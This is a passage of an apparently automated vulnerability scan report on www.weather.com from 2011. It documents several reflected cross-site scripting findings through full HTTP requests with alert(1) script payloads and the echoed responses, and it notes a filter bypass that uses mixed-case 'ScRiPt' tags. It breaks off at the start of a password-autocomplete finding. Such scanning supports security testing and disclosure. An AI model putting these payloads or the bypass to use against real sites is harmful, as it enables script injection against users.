wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert("XSS")-"370523ec97/bc/favicon2.ico4f2ca"-alert(1)-"67dc3956ab6",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...

1.27. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895a6"><script>alert(1)</script>4ee4cfc3b19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico895a6"><script>alert(1)</script>4ee4cfc3b19 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:43:41 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x02
X-Varnish: 2184766087
Date: Thu, 24 Mar 2011 17:43:11 GMT
Connection: keep-alive
Content-Length: 160121

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<a
                           href="/weather/map/interactive/bc/favicon2.ico895a6"><script>alert(1)</script>4ee4cfc3b19" from="nav_secondary" >
...[SNIP]...

1.28. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag attribute. The payload 26243><script>alert(1)</script>dc934610b23 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico26243><script>alert(1)</script>dc934610b23 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:43:38 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x06
X-Varnish: 1156482513
Date: Thu, 24 Mar 2011 17:43:08 GMT
Connection: keep-alive
Content-Length: 160135

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert("XSS")-"370523ec97/bc/favicon2.ico26243><script>alert(1)</script>dc934610b23" />
...[SNIP]...

1.29. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload c1f25><script>alert(1)</script>4e7a608d98c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec97c1f25><script>alert(1)</script>4e7a608d98c/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:29 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x03
X-Varnish: 1510934644
Date: Thu, 24 Mar 2011 17:40:59 GMT
Connection: keep-alive
Content-Length: 160054

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert(1)-"370523ec97c1f25><script>alert(1)</script>4e7a608d98c/bc/favicon2.ico" />
...[SNIP]...

1.30. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c42e"-alert(1)-"d6b4ba102de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec977c42e"-alert(1)-"d6b4ba102de/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:34 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x06
X-Varnish: 1156439815
Date: Thu, 24 Mar 2011 17:41:04 GMT
Connection: keep-alive
Content-Length: 159973

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
= ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert(1)-"370523ec977c42e"-alert(1)-"d6b4ba102de/bc/favicon2.ico",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/2
...[SNIP]...

1.31. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd22c"><script>alert(1)</script>c14811a6efd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec97/bcdd22c"><script>alert(1)</script>c14811a6efd/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:39 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x04
X-Varnish: 1510938217
Date: Thu, 24 Mar 2011 17:41:09 GMT
Connection: keep-alive
Content-Length: 160104

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<a
                           href="/weather/map/interactive/bcdd22c"><script>alert(1)</script>c14811a6efd/favicon2.ico" from="nav_secondary" >
...[SNIP]...

1.32. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d86df"-alert(1)-"56616f0ff68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec97/bcd86df"-alert(1)-"56616f0ff68/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:44 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x07
X-Varnish: 2184727898
Date: Thu, 24 Mar 2011 17:41:14 GMT
Connection: keep-alive
Content-Length: 160030

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert(1)-"370523ec97/bcd86df"-alert(1)-"56616f0ff68/favicon2.ico",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2
...[SNIP]...

1.33. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload df27c><script>alert(1)</script>4d53e0d49b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec97/bcdf27c><script>alert(1)</script>4d53e0d49b1/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:36 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x00
X-Varnish: 1097013162
Date: Thu, 24 Mar 2011 17:41:06 GMT
Connection: keep-alive
Content-Length: 160099

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert(1)-"370523ec97/bcdf27c><script>alert(1)</script>4d53e0d49b1/favicon2.ico" />
...[SNIP]...

1.34. http://www.weather.com/weather-apps/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather-apps/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e879e"-alert(1)-"0b38706c039 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather-appse879e"-alert(1)-"0b38706c039/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_primary; s_pers=%20s_nr%3D1300987997794%7C1303579997794%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather-apps/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:37:55 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x07
X-Varnish: 2366509814
Date: Thu, 24 Mar 2011 17:37:25 GMT
Connection: keep-alive
Content-Length: 159833

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/weather-appse879e"-alert(1)-"0b38706c039/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...

1.35. http://www.weather.com/weather-apps/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather-apps/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17d05"><ScRiPt>alert(1)</ScRiPt>e409bdb67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /weather-apps17d05"><ScRiPt>alert(1)</ScRiPt>e409bdb67f4/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_primary; s_pers=%20s_nr%3D1300987997794%7C1303579997794%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather-apps/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:37:49 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x05
X-Varnish: 1510862922
Date: Thu, 24 Mar 2011 17:37:19 GMT
Connection: keep-alive
Content-Length: 159916

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/weather-apps17d05"><ScRiPt>alert(1)</ScRiPt>e409bdb67f4/" />
...[SNIP]...

2. Password field with autocomplete enabled
There are 3 instances of this issue:


2.1. http://www.weather.com/activities/driving/rushhour/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weather.com
Path:   /activities/driving/rushhour/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /activities/driving/rushhour/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
